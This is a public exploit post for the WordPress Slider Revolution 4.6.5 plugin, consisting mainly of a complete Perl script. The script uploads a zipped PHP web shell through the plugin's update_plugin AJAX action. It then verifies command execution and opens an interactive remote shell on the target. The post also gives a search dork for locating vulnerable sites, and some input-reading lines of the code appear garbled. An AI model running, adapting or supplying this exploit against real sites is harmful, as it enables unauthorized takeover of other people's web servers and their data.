==================================================================================================================================== | # Title : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://www.sliderrevolution.com/ | | # Dork : index off revslider\backup | ==================================================================================================================================== [+] poc : [+] Web shell upload : The following perl exploit will attempt to load the HTTP php shell through the update_plugin function To use the exploit, be sure to compress the backdoor file Because the exploit uploads a compressed file to the target [+] simple backdoor : [+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip) [+] The exploit and the backdoor must be in the same folder and path [+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine [+] Perl exploit : #!/usr/bin/perl # # Title :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit # Author :indoushka # Vendor :https://www.sliderrevolution.com/ use LWP::UserAgent; use MIME::Base64; use strict; sub banner { system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print " ============[+] Author : indoushka[+]===================\n"; print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit [+]\n"; print " ======================================================== \n"; print "[+] Uploading an web shell: [+]\n"; print "[+] The following perl exploit will attempt to load the [+]\n"; print "[+] HTTP php backdoor through the update_plugin function [+]\n"; print "[+] To use the exploit, make sure you compress the backdoor[+]\n"; print "============================================================== \n"; system('color a'); } if (!defined ($ARGV[0] && $ARGV[1])) { banner(); print "perl $0 \n"; print "perl $0 http://localhost revslider\n"; exit; } my $zip1 = "indoushka.zip"; unless (-e ($zip1)) { banner(); print "[-] $zip1 not found! RTFM\n"; exit; } my $host = $ARGV[0]; my $plugin = $ARGV[1]; my $action; my $update_file; if ($plugin eq "revslider") { $action = "revslider_ajax_action"; $update_file = "$zip1"; } elsif ($plugin eq "showbiz") { $action = "showbiz_ajax_action"; } else { banner(); print "[-] Wrong plugin name\n"; print "perl $0 \n"; print "perl $0 http://localhost revslider\n"; exit; } my $target = "wp-admin/admin-ajax.php"; my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; sub randomagent { my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' ); my $random = $array[rand @array]; return($random); } my $useragent = randomagent(); my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); $ua->agent($useragent); my $status = $ua->get("$host/$target"); unless ($status->is_success) { banner(); print "[-] Xploit failed: " . $status->status_line . "\n"; exit; } banner(); print "[*] Target set to $plugin\n"; print "[*] MorXploiting $host\n"; my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]); print "[*] Sent payload\n"; if ($exploit->decoded_content =~ /Wrong update extracted folder/) { print "[+] Payload successfully executed\n"; } elsif ($exploit->decoded_content =~ /Wrong request/) { print "[-] Payload failed: Not vulnerable\n"; exit; } elsif ($exploit->decoded_content =~ m/0$/) { print "[-] Payload failed: Plugin unavailable\n"; exit; } else { $exploit->decoded_content =~ /<\/b>(.*?)
/; print "[-] Payload failed:$1\n"; print "[-] " . $exploit->decoded_content unless (defined $1); print "\n"; exit; } print "[*] Checking if shell was uploaded\n"; sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] } my $rndstr = rndstr(8, 1..9, 'a'..'z'); my $cmd1 = encode_base64("echo $rndstr"); my $status = $ua->get("$host/$shell?cmd=$cmd1"); if ($status->decoded_content =~ /system\(\) has been disabled/) { print "[-] Xploit failed: system() has been disabled\n"; exit; } elsif ($status->decoded_content !~ /$rndstr/) { print "[-] Xploit failed: " . $status->status_line . "\n"; exit; } elsif ($status->decoded_content =~ /$rndstr/) { print "[+] Shell successfully uploaded\n"; } my $cmd2 = encode_base64("whoami"); my $whoami = $ua->get("$host/$shell?cmd=$cmd2"); my $cmd3 = encode_base64("uname -n"); my $uname = $ua->get("$host/$shell?cmd=$cmd3"); my $cmd4 = encode_base64("id"); my $id = $ua->get("$host/$shell?cmd=$cmd4"); my $cmd5 = encode_base64("uname -a"); my $unamea = $ua->get("$host/$shell?cmd=$cmd5"); print $unamea->decoded_content; print $id->decoded_content; my $wa = $whoami->decoded_content; my $un = $uname->decoded_content; chomp($wa); chomp($un); while () { print "\n$wa\@$un:~\$ "; chomp(my $cmd=); if ($cmd eq "exit") { print "Aurevoir!\n"; exit; } my $ucmd = encode_base64("$cmd"); my $output = $ua->get("$host/$shell?cmd=$ucmd"); print $output->decoded_content; } Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg | | =======================================================================================================================================